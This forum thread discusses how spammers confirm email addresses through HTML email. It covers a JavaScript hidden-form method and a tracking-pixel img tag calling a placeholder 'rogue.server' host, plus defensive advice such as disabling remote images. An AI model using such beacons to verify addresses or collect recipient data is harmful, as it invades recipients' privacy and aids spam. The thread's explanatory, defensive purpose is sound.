How spammers can confirm your email address without you even responding.


  1. #1

    I have found a way for a spammer to confirm an email address is valid without the user even responding to it. Here is how it is done. An email with an HTML form with hidden values is sent to the unfortunate recipient. A JavaScript is inserted to acquire information such as the screen dimensions, browser and operating system version. The email software then puts the email and all the JavaScript information plus the email address into hidden fields. This JavaScript is loaded when the email is opened and the JavaScript function sends the HTML form back to the spammer. Then on the spammer side, he uses Perl to get statistics such as IP Address and UserID. VOILA! THE SPAMMER HAS A CONFIRMED EMAIL ADDRESS AND IMPORTANT DEMOGRAPHIC INFORMATION JUST RIPE FOR EXPLOITATION.


    The Moral of the Story:
    DON'T HAVE JAVASCRIPT ENABLED ON YOUR EMAIL!!!!

  2. #2
    Just Another Geek
    Join Date
    Jul 2002
    Location
    Rotterdam, Netherlands
    Posts
    3,401
    Originally posted here by the thread starter
    I have found a way for a spammer to confirm an email address is valid without the user even responding to it.
    It's been used and abused before.. You're not the first one to think of this.

    Why use JavaScript? It's, by default, turned off in today's mail clients..

    Something like a remote image will do the trick quite nicely too..

    Code:
    <img src=http://rogue.server/pic.php?id=123456787>
    Generate a new ID for every email sent.. Use a database or something to log the ID->email address relation.. Create pic.php to log the ID (and everything else you want) and make it return a GIF/JPG..

    Unless of course remote images are turned off in the mail client, the user only has to open/read the email.
    Oliver's Law:
    Experience is something you don't get until just after you need it.

  3. #3
    Senior Member therenegade's Avatar
    Join Date
    Apr 2003
    Posts
    400
    Wouldn't the better moral be 'Don't open email from people you don't know'?

  4. #4
    Just Another Geek
    Join Date
    Jul 2002
    Location
    Rotterdam, Netherlands
    Posts
    3,401
    Originally posted here by therenegade
    Wouldn't the better moral be 'Don't open email from people you don't know'?
    Good point.. But... A lot of viruses/worms come from friends and family.. Sometimes spam too (faked email From: address)..
    Oliver's Law:
    Experience is something you don't get until just after you need it.

  5. #5
    Senior Member therenegade's Avatar
    Join Date
    Apr 2003
    Posts
    400
    Originally posted here by SirDice
    But... A lot of viruses/worms come from friends and family.. Sometimes spam too (faked email From: address)..
    Which is when we fall back on to the 'Don't open attachments you're not really sure of' rule.. admittedly, this fails in lieu of the average home user... as does enforcing a strict security policy (I don't think I've seen too many who surf from non-admin accounts... actually, I think a lot of them don't even know that there're other types of accounts... or that they're on an admin account).. unfortunately it's what's happening in a lot of homes all over today.. which is why we go back to 'Get an AV and keep it updated.'

  6. #6
    Just Another Geek
    Join Date
    Jul 2002
    Location
    Rotterdam, Netherlands
    Posts
    3,401
    The average home user is also the reason why remote images and JavaScript are turned off by default.
    Oliver's Law:
    Experience is something you don't get until just after you need it.

  7. #7
    Senior Member treanglin's Avatar
    Join Date
    Dec 2003
    Posts
    111
    The best way to view all e-mails, in my experience, is in a text-only mode. All of the mail clients I use convert HTML messages to text-only messages, and then they give you the option to view the HTML version if you want.
    "Do you know why the system is slow?" they ask

    "It's probably something to do with..." I look up today's excuse ".. clock speed"
    -BOFH

  8. #8
    Senior Member therenegade's Avatar
    Join Date
    Apr 2003
    Posts
    400
    True SirDice... but the average user ever so often has the tendency to try and enable it for perceived 'added functionality' (read as chat, pr0n, whatever)
